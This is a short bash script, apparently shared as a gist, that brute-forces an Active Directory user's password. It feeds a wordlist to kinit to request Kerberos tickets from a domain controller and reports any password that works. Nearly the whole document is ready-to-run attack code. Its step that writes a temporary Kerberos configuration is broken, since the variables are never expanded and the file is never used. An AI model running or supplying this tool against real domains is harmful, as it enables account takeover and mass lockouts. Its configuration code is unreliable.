A quick tool to bruteforce an AD user's password by requesting TGTs from the Domain Controller with 'kinit'

kinit_brute.sh

#!/bin/bash

# Title: kinit_brute.sh
# Author: @ropnop
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful


USERNAME=$1
DOMAINCONTROLLER=$2
WORDLIST=$3

if [[ $# -ne 3 ]]; then
	echo "[!] Usage: ./kinit_brute.sh full_username domainController wordlist_file"
	echo "[!] Example: ./kinit_brute.sh ropnop@contoso.com dc01.contoso.com passwords.txt"
	exit 1
fi

DOMAIN=$(echo $USERNAME | awk -F@ '{print toupper($2)}')

echo "[+] User: $USERNAME"
echo "[+] Kerberos Realm: $DOMAIN"
echo "[+] KDC: $DOMAINCONTROLLER"
echo ""

KRB5_CONF=$(mktemp)

cat > $KRB5_CONF <<'asdfasdf'
[libdefaults]
	default_realm = $DOMAIN
[realms]
	$DOMAIN = {
		kdc = $DOMAINCONTROLLER
		admin_server = $DOMAINCONTROLLER
	}
asdfasdf

while read PASSWORD; do
	RESULT=$(
	echo $PASSWORD | kinit --password-file=STDIN $USERNAME 2>&1
	)
	if [[ $RESULT == *"unable to reach"* ]]; then
		echo "[!] Unable to find KDC for realm. Check domain and DC"
		exit 1
	fi
	if [[ $RESULT == *"Wrong realm"* ]]; then
	       echo "[!] Wrong realm. Make sure domain and DC are correct"
     	       exit 1
        fi
	if [[ $RESULT == *"Clients credentials have been revoked"* ]]; then
		echo "[!] Account locked out!"
		exit 1
	fi
	if [[ $RESULT == *"Password incorrect"* ]]; then
		:
	elif [[ -z "$RESULT" ]]; then
		echo "[+] Found password: $PASSWORD"
		echo ""
		exit 1
	else
		echo "[+] Error: $RESULT"
	fi
done <$WORDLIST